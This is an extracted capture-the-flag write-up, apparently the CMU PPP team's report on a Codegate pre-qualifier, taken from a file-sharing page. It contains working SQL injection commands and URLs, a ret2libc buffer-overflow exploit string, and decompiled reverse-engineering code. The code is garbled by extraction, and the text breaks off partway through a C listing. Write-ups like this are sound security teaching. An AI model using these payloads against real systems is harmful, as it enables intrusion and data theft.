Codegate 2010 Prequal - Problem Solution - PPP.pdf

(848 KB) Pobierz
Codegate 2010 Prequal - Problem Solution
Plaid Parliament of Pwning
- Security Research Group at CMU
March 9, 2011
1
Introduction
This is a report for Codegate 2011 pre-qual from
Plaid Parliament of Pwning
(PPP), Carnegie
Mellon University’s Security Group. This report describes walk-throughs for all the challenges that
we have completed during the competition. This report file is also available at
http://ppp.cylab.
cmu.edu.
2
Walk-throughs
Vulnerability 100
Upon visiting the given link, we find that the site blocks Firefox and Chrome, for no apparent
reason. Changing our User-Agent to IE, we reach a login screen and sign up for an account.
Logging in, we see a music player application. After some failed attempts to upload and run a PHP
file, we try submitting an mp3 with single quotes in ID3 tags. This results in an SQL error.
With some experimentation, we noticed that script joins the title, artist, album, year, and
comment fields together with slashes and inserts the resulting string into a table. Since it checks
that the year is numeric, we are unable to use this field in the injection.
From here, we use SQL injection to dump the table names. This is slightly annoying because
the application seems to limit most id3 tags to 28 characters, and since the output of the query is
also truncated before it is displayed.
1
for i in {0..36}
do
3
lame sine . wav -- tt "a ’ ,( select table_name /**" -- ta " from /**" -- tl "
information_schema . tables /*" -- ty "2011" -- tc " a */ limit $i ,1) ) ;#" sine . mp3
curl -D - -b PHPSESSID = h q j c p v u b t l p t a e q b n q r b t 7 c 6 4 3 http ://221.141.3.110/ __music /
music_upload_ok . php -F ’ myFile = @sine . mp3 ’
5
done
We notice a table called
vul100pwd.
Using
1
lame sine . wav -- tt "a ’ ,( select column_name /**" -- ta " from information_schema ./**"
-- tl " columns where table_name =/*" -- ty "2011" -- tc " a */ ’ vul100pwd ’ limit 0 ,1) )
;#" sine . mp3
we find that it contains a column pwpw. Finally, we select the key from the table:
1
1
lame sine . wav -- tt "a ’ ,( select group_concat (/**" -- ta " pwpw ) from vul100pwd ) ) #" --
tl " x " -- ty " x " -- tc " x " sine . mp3
Key: hello, sonic!
Vulnerability 200
We are given a website with a login prompt. After registering and logging in, we saw a message
board-like page. In the source of the page is a comment with the string
hint 0,
although it is not
immediately obvious what this means.
We notice that there is a trivial SQL injection vulnerability in view.php, but after dumping all
of the tables, we realize that the MySQL user that the vulnerable query is running as does not
have access to some tables (such as the table with the auth credentials).
After the hint “Get Administrator account” was revealed, we found that we were able to login
as Administrator using either the passwords “a” or “Administrator”. When logged in as Adminis-
trator, the comment on the the main page contains
hint 1
instead. At this point, we also notice
that a cookie named language set with the value English. Setting this cookie to “’” returns a page
where the comment has an SQL error.
Now, we dump the table names with:
1
curl http ://221.141.3.112/ dashboard . php -b " PHPSESSID = k j e b s 3 2 v 0 b 9 4 m t v c k 5 h 1 e o i n q 3 ;
lang = ’ union select ( select group_concat ( table_name ) from i nf ormation_schema .
tables ) ,1#"
We then notice that the
raw data
table has columns
data id
and
data value
and contains 101
rows of base64 strings. We dump them with:
2
1
for i in {0..100}
do
3
curl http ://221.141.3.112/ dashboard . php -b " PHPSESSID =
k j e b s 3 2 v 0 b 9 4 m t v c k 5 h 1 e o i n q 3 ; lang = ’ union select ( select data_value from
raw_data limit $i ,1) ,1#" | grep hint | sed -e ’s /.* hint // ’ -e ’s / - - > $ // ’ >
$i
done
After base64 decoding each row, we find that row 20 contains a broken PNG image, unlike all
of the other rows, which contain random numbers. Looking at the data, we see that it contains the
string
FLAG:391ce70ad3dba822611ce5a61eb7125e.
Key: 391ce70ad3dba822611ce5a61eb7125e
Vulnerability 300
This is your standard Linux binary pwnable. SSH in, exploit the setuid binary, and grab the key.
The binary had an obvious bug: strncpy followed by a strncat. This allowed you to overwrite
the return address. However, the server was a recent version of Ubuntu, so the NX bit was enabled
and addresses were randomized.
Our solution to defeat address randomization was to brute-force. On 32-bit Linux, library
addresses only have 12 bits of randomization, so if you can run your exploit several thousand times,
probability says you will eventually guess right. Unfortunately, the creator decided to put a sleep
into the binary (probably to discourage brute-force). This can be bypassed by simply running each
binary in the background, instead of waiting for each one to finish.
To defeat the NX bit we used standard ret2libc method. Our specific target was execve. In
order to setup the arguments to execve, we used a stack pivot to point into the arguments to
the program. We pointed the first argument of execve to ”s0m3b0dy:15n0b0dy”, and the other
arguments to a null DWORD.
The exploit string then is:
/ home / vuln1 / vuln300 - us0m3b0dy - p15n0b0dy -x ‘ perl -e ’ print " A " x0x1fd ’ ‘ - fa -y ‘
perl -e ’ print " AAABB " ," CCCC " ,"\ x31 \ x56 \ xbd \ x00 " ’ ‘ ‘ perl -e ’ print "\ x64 \ x85 \
x04 \ x08 " x0x1000 ,"\ x10 \ x75 \ xb7 " ’ ‘ ‘ perl -e ’ print " DDDD " ,"\ x16 \ x8a \ x04 \ x08 \ x20 \
x9f \ x04 \ x08 \ x20 \ x9f \ x04 \ x08 " ’ ‘ ’A ’
Once we get a shell, we can then read /home/vuln1/flag.txt which gives us the key.
Key: 33f9876804c9a14e927e5d1d70a64ace
Vulnerability 400
Another SQL injection challenge. This time the target is a message board site, which contains a
protected post. In order to read the post, we need to figure out its password.
If you attempt a standard SQL injection, you are told that you can’t use a single quote (’) in
the query string. This means that they are searching for the single quote character in the query
variable.
A possible way to bypass filtering, is to embed null bytes in the query and post variables.
OWASP has a great example of this:
http://www.owasp.org/index.php/Embedding_Null_Code.
3
So, let’s try adding a %00%27 to the end of a query variable. We don’t get the error about a single
quote.
Now, let’s try this on an exploitable query variable. We used the search variable since it is
probably a simple query. Note that we had to bruteforce to find the correct number of columns in
the rows.
1
http ://221.141.3.111/ __board / board . php ? order = subject & search = test %00%27 UNION
SELECT ’a ’ , ’b ’ , ’c ’ , ’d ’ , ’e ’ , ’f ’ , ’g ’ , ’h ’ , ’i ’ , ’j ’ , ’k ’ %23
This produces a single result with the subject ’c’. It is now trivial to make this return the tables
and columns in the database.
1
http ://221.141.3.111/ __board / board . php ? order = subject & search = test %00%27 UNION
SELECT ’a ’ , ’b ’ ,( SELECT GROUP_CONCAT ( TABLE_NAME ) FROM INFORMATION_SCHEMA . TABLES )
,’d ’ , ’e ’ , ’f ’ , ’g ’ , ’h ’ , ’i ’ , ’j ’ , ’k ’ %23
http ://221.141.3.111/ __board / board . php ? order = subject & search = test %00%27 UNION
SELECT ’a ’ , ’b ’ ,( SELECT GROUP_CONCAT ( COLUMN_NAME ) FROM INF OR MATION_SCHEMA .
COLUMNS WHERE TABLE_NAME = ’ sonic_board ’) ,’d ’ , ’e ’ , ’f ’ , ’g ’ , ’h ’ , ’i ’ , ’j ’ , ’k ’ %23
Clearly, the column we are looking for is pass. Alternatively, we could just print the content.
http ://221.141.3.111/ __board / board . php ? order = subject & search = test %00%27 UNION
SELECT ’a ’ , ’b ’ ,( SELECT pass FROM sonic_board LIMIT 1) ,’d ’ , ’e ’ , ’f ’ , ’g ’ , ’h ’ , ’i ’ , ’
j ’ , ’k ’ %23
The password is:
sonic!%#$**()%#_?qwerasdfzxcv{}
The content is:
Wow! Congratulation!
Password is : HackingForCola
Key: HackingForCola
Binary 100
We are given a file that contains what seems to be gibberish. Since file cannot identify the
file type, we did a Google code search for the first 4 characters,
#@∼^
and find that it is a
file encoded with Microsoft’s script encoder utility. We decode this using the utility at
http:
//www.virtualconspiracy.com/index.php?page=scrdec/intro,
and find that the “binary” is
obfuscated javascript code.
Placing this code into an HTML file, and running using firebug to list the variables, shows that
there is a variable
CodeGate JavaScriptEncode Key
with value
120a151156120a163t111163120lea163u162e!.
Key: 120a151156120a163t111163120lea163u162e!
4
Binary 200
Reverse me!!
The first real binary challenge is a Windows exe file. However, when we try to run it, it appears
to do nothing.
So, we open it in IDA to see what is going on. There is a lot of stuff in the program, but
immediately a function catches our eye. sub 401130 is moving lots of bytes on to the stack, a sure
sign of somebody trying to hide a string. And then at the end, it does a printf call with %s as the
format string. This function probably generates the key.
Further investigation of the function shows that it only calls one other function, sub 401070,
which doesn’t call any other functions. And it doesn’t use a lot of global variables. This makes it
a perfect function to just decompile into C and run. The C code and its output are below.
1
http :// forensic - proof . com / archives /552
Listing 1: Output
1
char unk_409610 [260];
short word_409714 = 0;
3
char * sub_401070 ( int a1 )
5
{
char * result ;
7
char * v2 ;
int v3 ;
9
v3 = a1 ;
11
v2 = unk_409610 ;
while ( *( unsigned char *) v3 )
13
{
*( unsigned char *) v2 = word_409714 ^ *( unsigned char *) v3 ;
15
v2 = ( char *) v2 + 1;
++ v3 ;
17
}
result = v2 ;
19
*( unsigned char *) v2 = 0;
return result ;
21
}
23
int main ()
{
25
int v0 ;
char * v2 ;
27
char v3 ;
char v4 ;
29
char v5 ;
char v6 ;
31
char v7 ;
char v8 ;
33
char v9 ;
char v10 ;
35
char v11 ;
char v12 ;
5

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika:

Zgłoś jeśli naruszono regulamin